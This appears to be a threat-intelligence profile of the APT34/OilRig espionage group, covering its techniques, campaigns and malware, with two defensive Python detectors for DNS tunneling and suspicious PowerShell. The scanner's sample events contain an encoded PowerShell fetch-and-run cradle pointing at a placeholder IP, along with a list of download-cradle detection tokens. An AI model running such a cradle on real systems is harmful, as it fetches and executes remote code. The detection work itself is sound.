analyst@nohacky:~/apt34-oilrig.html
active threat profile
type nation-state
threat_level HIGH
status ACTIVE
origin Iran
last_updated 2026-03-13

APT34 / OilRig

also known as: OilRig, Helix Kitten, COBALT GYPSY, Evasive Serpens, Hazel Sandstorm, EUROPIUM

APT34, widely tracked as OilRig, is an Iran-aligned espionage cluster that has targeted government, energy, financial, telecommunications, and technology-linked organizations since at least 2014. The group is notable for persistent credential-driven intrusions, PowerShell-heavy malware, Exchange abuse, custom backdoors, and opportunistic use of supply-chain and trust-relationship pivots across the Middle East and beyond.

attributed origin Iran
suspected sponsor Iranian state / likely MOIS-linked
first observed 2014
primary motivation Espionage / strategic intelligence collection
primary targets Government, energy, financial services, telecom, technology
known campaigns 6+ documented clusters/campaigns
mitre att&ck group G0049
target regions Middle East, Europe, North America
threat level HIGH

Overview

APT34, commonly called OilRig, is a suspected Iranian state-aligned intrusion set tracked in MITRE ATT&CK as G0049. Public reporting places the group in sustained operation since at least 2014, with targeting concentrated in the Middle East but not limited to that region. Organizations in government, financial services, telecommunications, chemical, energy, and technology supply chains have all appeared in publicly documented activity.

Multiple vendors map overlapping activity to names including Helix Kitten, COBALT GYPSY, Evasive Serpens, EUROPIUM, and more recently Hazel Sandstorm or Earth Simnavaz. The naming overlap is imperfect across vendors, but the common profile is stable: long-duration espionage operations, extensive use of stolen credentials, phishing and attachment-based delivery, PowerShell and .NET malware, Exchange-centric credential theft, IIS abuse, and iterative retooling rather than one fixed malware family.

OilRig has historically paired custom malware with pragmatic operator tradecraft. Reporting from Unit 42 and Mandiant shows repeated reliance on compromised mailboxes, malicious macro documents, RTF exploit chains, PowerShell loaders, and credential harvesting to pivot through trusted entities toward higher-value downstream targets. More recent research from Trend Micro indicates the cluster remains active through 2024 and continues to evolve with new Exchange-oriented credential theft tooling and privilege-escalation exploitation.

Target Profile

OilRig's victimology strongly aligns with intelligence collection and access development in geopolitically sensitive environments. The group tends to prefer organizations that either hold strategic data directly or can be used as intermediaries to reach those primary targets.

  • Government and public-sector entities: Ministries, agencies, and administrative bodies in the Middle East have been recurrent targets for diplomatic, political, and strategic intelligence collection.
  • Energy, oil, gas, and critical infrastructure: Campaign reporting repeatedly places OilRig against oil and gas organizations, utilities, and infrastructure-linked entities, reflecting Iran-linked strategic collection priorities.
  • Financial services and telecommunications: Banks, telecom providers, and adjacent service organizations have been targeted for both intelligence value and their position in trusted communications or transaction ecosystems.
  • Technology service providers and supply-chain intermediaries: OilRig has shown interest in leveraging trusted third parties, including service providers and compromised government-linked accounts, to stage or relay attacks into intended end targets.

Tactics, Techniques & Procedures

Observed tradecraft blends phishing-led initial access, living-off-the-land execution, credential theft, web and DNS-based command and control, and persistence mechanisms adapted to Windows enterprise environments. The rows below summarize representative ATT&CK techniques repeatedly tied to OilRig public reporting.

  • T1566.001 Spearphishing Attachment: Repeatedly delivers malicious Office, RTF, and macro-enabled lure documents to targeted users; several campaigns used compromised accounts to improve trust and delivery success.
  • T1059.001 PowerShell: Uses PowerShell extensively for downloaders, backdoors, stagers, discovery, and execution. Families such as BONDUPDATER and PowerExchange reflect the group's long-running PowerShell emphasis.
  • T1555 Credentials from Password Stores: ATT&CK procedure examples tie OilRig to credential dumping tools such as LaZagne, used to harvest credentials for accounts logged into compromised hosts and for Outlook Web Access.
  • T1556.002 Password Filter DLL: OilRig has registered malicious password filter DLLs so that LSA passes the plaintext of every password change to attacker code, a higher-end persistence and collection mechanism seen again in later reporting.
  • T1071.004 DNS: Several OilRig-associated backdoors use DNS-based command and control or tunneling, encoding tasking and results in query names and responses so the traffic blends into expected enterprise DNS and evades simplistic filtering.
  • T1204.002 User Execution: Malicious File: The group routinely depends on victims opening lure documents or executables that trigger follow-on PowerShell or .NET payload execution after social engineering succeeds.
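As an added example (not part of the original profile and not any vendor's tooling), the Python script below shows one way to surface the DNS tunneling pattern described under T1071.004. It parses a constructed resolver log (the line format, the domain names, the client address and every threshold are assumptions) and scores each registered domain on the entropy of its subdomain labels, the share of hex-only labels, the share of TXT/NULL queries, and the size of the largest single subdomain payload. It goes slightly beyond the paragraph by adding a volume gate: one hashed CDN label is normal and should not fire, while a burst of distinct encoded subdomains under one domain should.

```python
import math
import re
from collections import defaultdict

# Constructed sample resolver log (not real traffic). Assumed line format:
# "<timestamp> <client-ip> <qtype> <qname>". All domains are placeholders.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.12 A www.example.com
2024-05-01T10:00:02Z 10.0.0.12 A mail.example.com
2024-05-01T10:00:03Z 10.0.0.12 A static.example.com
2024-05-01T10:00:04Z 10.0.0.12 A d41d8cd98f00b204.cdn-example.net
2024-05-01T10:00:05Z 10.0.0.12 A 5c8e1a7d0b42.9f3a1c7e2b6d4f80.updates-sync.net
2024-05-01T10:00:06Z 10.0.0.12 A 77d21e0c4fa9.1b2c3d4e5f607182.updates-sync.net
2024-05-01T10:00:07Z 10.0.0.12 TXT 0aa91ff3b7c2.e9d8c7b6a5f43210.updates-sync.net
2024-05-01T10:00:08Z 10.0.0.12 A c4d5e6f7a8b9.13579bdf2468ace0.updates-sync.net
2024-05-01T10:00:09Z 10.0.0.12 TXT 8b7a6c5d4e3f.fedcba9876543210.updates-sync.net
2024-05-01T10:00:10Z 10.0.0.12 A 2e4f6a8c0b1d.0f1e2d3c4b5a6978.updates-sync.net
2024-05-01T10:00:11Z 10.0.0.12 A idp.corp-example.com
2024-05-01T10:00:12Z 10.0.0.12 A 4a3b2c1d0e9f8a7b6c5d4e3f2a1b0c9d8e7f6a5b4c3d2e1f0a9b8c7d6e5f.exfil-example.org
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+([A-Z]+)\s+(\S+)$")
HEX_LABEL = re.compile(r"[0-9a-f]{8,}")


def parse_log(text):
    """Parse the assumed resolver log format; malformed lines are skipped, not fatal."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, qtype, qname = m.groups()
        records.append({"ts": ts, "client": client, "qtype": qtype,
                        "qname": qname.rstrip(".").lower()})
    return records


def shannon_entropy(s):
    """Bits per character: plain words sit around 2-3, hex payloads near 4, base32 near 5."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain labels, registered domain). Assumption: the registered domain is
    the last two labels; a real deployment should consult the public suffix list."""
    labels = qname.split(".")
    return labels[:-2], ".".join(labels[-2:])


def query_features(qname):
    sub, _ = split_name(qname)
    joined = "".join(sub)
    return {"sub_len": len(joined),
            "entropy": shannon_entropy(joined),
            "hexlike": bool(sub) and all(HEX_LABEL.fullmatch(label) for label in sub)}


def score_domains(records, min_unique=5, entropy_threshold=3.0, hex_ratio_threshold=0.8,
                  txt_ratio_threshold=0.3, max_single_sub_len=48):
    """Aggregate per registered domain and return the ones that look like a tunnel.
    All thresholds are assumptions to tune against your own resolver baseline."""
    per_domain = defaultdict(list)
    for r in records:
        _, dom = split_name(r["qname"])
        per_domain[dom].append(r)

    findings = {}
    for dom, recs in per_domain.items():
        feats = [query_features(r["qname"]) for r in recs]
        unique_names = len({r["qname"] for r in recs})
        mean_entropy = sum(f["entropy"] for f in feats) / len(feats)
        hex_ratio = sum(f["hexlike"] for f in feats) / len(feats)
        txt_ratio = sum(r["qtype"] in ("TXT", "NULL") for r in recs) / len(recs)
        longest = max(f["sub_len"] for f in feats)
        reasons = []
        # Aggregate rules only fire with volume: one hashed CDN label is normal,
        # many distinct encoded labels under one domain are not.
        if unique_names >= min_unique:
            if mean_entropy >= entropy_threshold:
                reasons.append(f"mean subdomain entropy {mean_entropy:.2f} over {unique_names} unique names")
            if hex_ratio >= hex_ratio_threshold:
                reasons.append(f"{hex_ratio:.0%} of queries carry hex-only labels")
            if txt_ratio >= txt_ratio_threshold:
                reasons.append(f"{txt_ratio:.0%} TXT/NULL queries (typical downlink channel)")
        # A single oversized subdomain is suspicious on its own: data-bearing queries
        # push toward the 63-byte label limit.
        if longest >= max_single_sub_len:
            reasons.append(f"subdomain payload of {longest} chars in one query")
        if reasons:
            findings[dom] = {"queries": len(recs), "unique_names": unique_names, "reasons": reasons}
    return findings


def hunt(log_text=SAMPLE_LOG):
    return score_domains(parse_log(log_text))


if __name__ == "__main__":
    for dom, info in hunt().items():
        print(f"{dom}: {info['queries']} queries, {info['unique_names']} unique names")
        for reason in info["reasons"]:
            print(f"  - {reason}")
```

Run it as-is to see the two flagged domains; point `hunt()` at a real resolver export once the line regex matches your log format. Expect to raise `min_unique` substantially on a busy recursive resolver, and to whitelist known CDN and security-vendor domains that legitimately use hashed labels.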

Known Campaigns

Public reporting attributes multiple intrusion clusters and campaign families to OilRig. Not every vendor uses identical naming, but the operations below are widely discussed and technically linked to the group's broader activity.

Middle East spearphishing and POWRUNER / BONDUPDATER activity 2017

Mandiant documented APT34 exploiting Office vulnerabilities including CVE-2017-0199 and CVE-2017-11882 to deploy PowerShell-centric backdoors against a Middle Eastern government organization. The campaign reinforced the group's focus on espionage, phishing delivery, and script-based implants.

QUADAGENT and OopsIE waves 2018

Unit 42 described OilRig campaigns targeting a technology services provider and government entities via compromised email accounts, spearphishing lures, QUADAGENT payloads, and updated OopsIE samples with anti-analysis and anti-VM logic.

LinkedIn-themed social engineering campaign 2019

Mandiant reported an APT34 intrusion attempt that abused professional-networking themed lures and introduced new malware families, illustrating continued innovation in social engineering while preserving the group's espionage-driven target selection.

Juicy Mix 2022

MITRE ATT&CK tracks Juicy Mix as an OilRig campaign targeting Israeli organizations during 2022 with the Mango backdoor, showing the group's continued development of staged .NET malware and regional espionage focus.

Earth Simnavaz Exchange- and infrastructure-focused intrusions 2024

Trend Micro reported ongoing APT34 activity in the Middle East involving Exchange-oriented credential theft, abuse of password filter policy, ngrok tunneling, IIS-based malware, and exploitation of CVE-2024-30088 for privilege escalation.


Tools & Malware

OilRig's malware ecosystem is broad and iterative. The group frequently reuses architectural patterns while changing payload names, packaging, or transport methods.

  • BONDUPDATER: PowerShell backdoor tied to OilRig, first observed in 2017 against a Middle Eastern government target and later seen in updated spearphishing operations.
  • Helminth: Backdoor family delivered through macro-enabled Excel documents and other formats; an early example of the group's preference for scripting-heavy intrusion chains.
  • QUADAGENT: PowerShell-based backdoor packaged into PE delivery chains, including bat2exe and .NET-wrapped variants, used in 2018 campaigns against government and technology-linked organizations.
  • OopsIE: Trojan family that evolved to include anti-analysis and anti-virtualization checks while preserving the group's lure-and-execute workflow.
  • Mango: C#/.NET first-stage backdoor used in the Juicy Mix campaign and described by MITRE as a successor to Solar with improved exfiltration and evasion behavior.
  • PowerExchange: PowerShell backdoor used since at least 2023 against Middle Eastern government targets, reinforcing that PowerShell remains central to OilRig tradecraft.
  • ISMInjector / ISMAgent: Dropper and backdoor pairing reported by Unit 42 in 2017; ISMInjector delivers the ISMAgent backdoor, which supports HTTP and DNS-tunneled C2 for follow-on post-compromise activity.

Mitigation & Defense

Defensive priorities should focus on reducing phishing success, constraining script execution, hardening identity infrastructure, and aggressively monitoring Exchange, IIS, and privileged authentication paths.

  • Harden identity infrastructure: Monitor for password filter DLL registration, LSASS and Exchange credential access attempts, suspicious mailbox rule creation, and unusual authentication flows from trusted internal accounts.
  • Constrain PowerShell and script abuse: Enforce Constrained Language Mode where feasible, centralize Script Block Logging and AMSI telemetry, alert on encoded commands, and baseline legitimate administrative script usage.
  • Prioritize phishing-resistant controls: Require phishing-resistant MFA for remote and administrative access, restrict macro execution from internet-sourced documents, and sandbox document attachments and RTF/Office exploit chains.
  • Patch rapidly for edge and privilege-escalation exposure: OilRig-aligned activity has repeatedly incorporated newly useful vulnerabilities; prioritize internet-facing applications, Exchange, VPN, and Windows local privilege-escalation fixes.
  • Inspect trusted-path pivots: Monitor for anomalous email sending from partner or government-linked accounts, unexpected service-provider remote access, and suspicious activity originating from legitimate but atypical third-party relationships.
  • Instrument IIS, DNS, and webshell detection: Review IIS worker process behavior, new ASPX or dropped web content, anomalous DNS query structures, and covert C2 patterns hidden in HTTP/DNS traffic.
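Added example, not code from the original page or from any vendor: a Python pass over constructed Sysmon-style JSON events that implements two of the checks listed above. It flags Notification Packages entries outside an assumed baseline (the password filter DLL mechanism in T1556.002) and decodes -EncodedCommand arguments to surface download-cradle tokens and Office parent processes (the PowerShell and user-execution bullets). Field names follow Sysmon Event 13 (registry value set) and Event 1 (process create); the baseline set, the space-separated Details layout, the DLL name pwfilter, the IP 198.51.100.23 and the token list are assumptions.

```python
import base64
import json
import re

# Assumed clean baseline for HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages:
# "scecli" on every Windows host, plus "rassfm" on domain controllers. Take the real
# value from your own golden image; anything outside it deserves a ticket.
BASELINE_NOTIFICATION_PACKAGES = {"scecli", "rassfm"}
NOTIFICATION_PACKAGES_RE = re.compile(r"\\Control\\Lsa\\Notification Packages$", re.IGNORECASE)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...) plus the
# -ec alias; the argument is base64 of a UTF-16LE string.
ENCODED_ARG_RE = re.compile(r"(?:^|\s)[-/]([eE][A-Za-z]*)\s+([A-Za-z0-9+/=]{8,})")
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                     "net.webclient", "frombase64string", "start-bitstransfer")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# Constructed sample events (not real telemetry) as Sysmon-style JSON lines.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/u')".encode("utf-16le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages",
     "Details": "scecli rassfm pwfilter"},          # pwfilter is a placeholder name
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages",
     "Details": "scecli rassfm"},                   # matches baseline, should stay quiet
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if there is none (or it is not base64)."""
    for flag, blob in ENCODED_ARG_RE.findall(command_line):
        f = flag.lower()
        if f != "ec" and not "encodedcommand".startswith(f):
            continue  # "-ep bypass" or "-ExecutionPolicy" is not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def check_notification_packages(event, baseline=BASELINE_NOTIFICATION_PACKAGES):
    """Sysmon Event 13 on the LSA Notification Packages value with an entry outside the baseline."""
    if event.get("EventID") != 13 or not NOTIFICATION_PACKAGES_RE.search(event.get("TargetObject", "")):
        return None
    entries = set(event.get("Details", "").split())   # assumption: space-separated multi-string
    unexpected = sorted(e for e in entries if e.lower() not in baseline)
    if not unexpected:
        return None
    return {"rule": "T1556.002 password filter DLL registered",
            "image": event.get("Image"), "unexpected": unexpected}


def check_powershell(event):
    """Sysmon Event 1 for PowerShell with an encoded command; severity rises with cradle tokens
    or an Office parent (the macro-to-PowerShell chain behind T1204.002)."""
    if event.get("EventID") != 1:
        return None
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    if decoded is None:
        return None
    hits = [t for t in SUSPICIOUS_TOKENS if t in decoded.lower()]
    office_parent = event.get("ParentImage", "").lower().endswith(OFFICE_PARENTS)
    return {"rule": "T1059.001 encoded PowerShell command",
            "severity": "high" if hits or office_parent else "low",
            "decoded": decoded, "tokens": hits, "office_parent": office_parent,
            "parent": event.get("ParentImage")}


def scan(log_text=SAMPLE_LOG):
    """Run every check over each JSON event line and return the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        for check in (check_notification_packages, check_powershell):
            finding = check(event)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan():
        print(json.dumps(finding, indent=2))
```

Low-severity encoded commands are still returned so they can be baselined against legitimate administrative scripts rather than silently dropped. Feed `scan()` a Sysmon JSON export from your pipeline; only the field names used here need to line up.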
Note: Vendor naming differs materially across Iranian intrusion reporting. This profile treats APT34 and OilRig as the same core cluster while noting that some vendor labels may cover overlapping but not perfectly identical activity.

— end of profile